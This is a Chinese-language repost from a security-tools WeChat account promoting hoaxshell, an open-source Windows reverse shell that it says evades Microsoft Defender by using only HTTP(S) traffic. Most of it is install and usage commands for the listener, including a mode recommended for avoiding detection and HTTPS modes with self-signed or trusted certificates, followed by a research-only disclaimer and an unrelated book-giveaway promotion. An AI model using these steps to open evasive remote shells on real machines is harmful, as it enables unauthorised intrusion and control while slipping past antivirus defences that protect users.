Windows反向shell -- hoaxshell
2022-9-6 00:1:43 Author: web安全工具库(查看原文) 阅读量:29 收藏

项目作者:t3l3machus

项目地址:https://github.com/t3l3machus/hoaxshell

0x01 工具介绍

hoaxshell 是一种非常规的 Windows 反向 shell,目前未被 Microsoft Defender 和可能的其他 AV 解决方案检测到,因为它完全基于 http(s) 流量。该工具易于使用,它生成自己的 PowerShell 有效负载并支持加密 (ssl)。

0x02 安装与使用

1、安装需要的库文件

git clone https://github.com/t3l3machus/hoaxshellcd ./hoaxshellsudo pip3 install -r requirements.txtchmod +x hoaxshell.py

2、通过 http 的基本 shell 会话

sudo python3 hoaxshell.py -s <your_ip>

3、避免检测的推荐用法(通过 http)

sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"

4、加密的 shell 会话 (https)

# Generate self-signed certificate:openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
# Pass the cert.pem and key.pem as arguments:sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

5、具有可信证书的加密 shell 会话

sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>

6、抓取会话模式

sudo python3 hoaxshell.py -s <your_ip> -g

0x03 下载地址

1、通过项目地址下载

2、关注web安全工具库公众号,后台回复:20220906

0x04 声明

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。

推 荐 阅 读

加我微信:ivu123ivu,进送书活动群,不定时免费送书

《代码大全2(纪念版)》

《软件开发》杂志Jolt大奖。大而全,洞悉软件构建精髓;优而先,兼顾行业实践研究;奠定硬核技术领导力的经典;庸常变身卓越的实用性指导。


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247504242&idx=1&sn=f40023032ed4a130c2b840652987a07b&chksm=ebb53e71dcc2b767b54308486960cb9efac408f3719e854bc652926abf79319692120d624046#rd
如有侵权请联系:admin#unsafe.sh